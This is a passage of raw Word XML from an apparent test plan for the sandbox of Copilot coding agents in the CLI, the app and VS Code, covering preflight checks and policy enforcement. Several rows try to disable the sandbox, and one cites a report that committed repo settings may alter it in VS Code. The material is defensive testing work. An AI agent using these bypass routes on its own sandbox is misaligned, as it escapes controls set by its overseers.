                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Copilot connections blocked until upgraded</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Chat shows required vs installed version; editor banner; Agents window blocking notice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">MDM values landed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">reg query HKLM\SOFTWARE\Policies\GitHubCopilot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Values present as </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">REG_SZ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same; also </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Developer: Policy Diagnostics</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> shows source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">WSL file policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ls -l /etc/github-copilot/managed-settings.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">root-owned, 0644, not a symlink — else file is rejected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Same file read by Agent Host in WSL 🔍</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Server-managed fetched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Enterprise → AI controls → Copilot settings validation; restart client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">No validation errors; values visible in </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Effective policy not shown in app UI 🔍 — use CLI on same account to confirm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Policy Diagnostics shows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">server-managed</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Legacy VS Code harness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Check </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Session Target</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> = Copilot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Agent Host session selected; Local harness ignores runtime sandbox rules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">PF-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1266" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Clean test repo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Repo on local NTFS (not OneDrive), fake secrets planted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1657" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1279" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2010" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Enablement and policy enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:r>
        <w:t xml:space="preserve">These prove the sandbox is actually on, comes from the right layer, and cannot be switched off where policy says so.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="868"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1611"/>
        <w:gridCol w:w="1442"/>
        <w:gridCol w:w="1337"/>
        <w:gridCol w:w="1427"/>
        <w:gridCol w:w="1337"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">How to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – Copilot app</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox ON – VS Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Sandbox OFF</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Enable via user setting</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (P1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CLI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox enable</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> · App Settings → Projects → Sandbox → </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandbox new sessions</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> · VS Code </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">"chat.agent.sandbox.enabled": "on"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Takes effect now; saved to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">settings.json</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Applies to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">new</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> local/working-tree sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Applies to new Copilot harness sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Commands run with full account rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Read effective policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CLI/VS Code </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox policy</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">; app: project Sandbox section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Lists R/W, read-only, denied paths, network, dev-tool access, Notes for missing paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ UI shows </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">requested</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> policy only, not managed locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Opens </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox-policy.md</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> with host, backend, FS and network policy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CLI says sandbox is off; VS Code report says restrictions not active</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Status check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">CLI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox status</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> · </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/statusline</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> · VS Code Permissions menu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Shows on + whether managed requires it; status line shows sandbox indicator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ No "Sandbox off" banner on the session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Sandboxing for terminal</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> shows on</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Status shows off</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Managed force-on</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (P2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Try to turn off: CLI </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">--no-sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> / user setting off · app </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox off</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> · VS Code session toggle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Cannot turn off; settings show </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">(managed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Project toggle and </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/sandbox off</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> cannot override</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ Toggle </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">locked</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> if </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">allowBypass</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> is false </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">or omitted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">User can freely turn it off (no managed key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Surfaces are independent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Enable in CLI only, then start app and VS Code sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ CLI sandboxed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ App </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> sandboxed (own setting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⛔ VS Code </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> sandboxed (own setting)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a — expected: settings never sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="868" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">EN-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Repo cannot set sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1611" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">Commit a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">sandbox</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> block into the repo's Copilot settings file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1442" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">✅ Ignored — repo-level files can't set sandbox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1337" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">n/a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1427" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:t xml:space="preserve">⚠️ Likely </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">yes</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> — a third-party report (cfgaudit#751) says </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">chat.agent.sandbox.*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> keys have no scope restriction, so a committed </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="CodeChar"/>
              </w:rPr>
              <w:t xml:space="preserve">.vscode/settings.json</w:t>
            </w:r>
            <w:r>
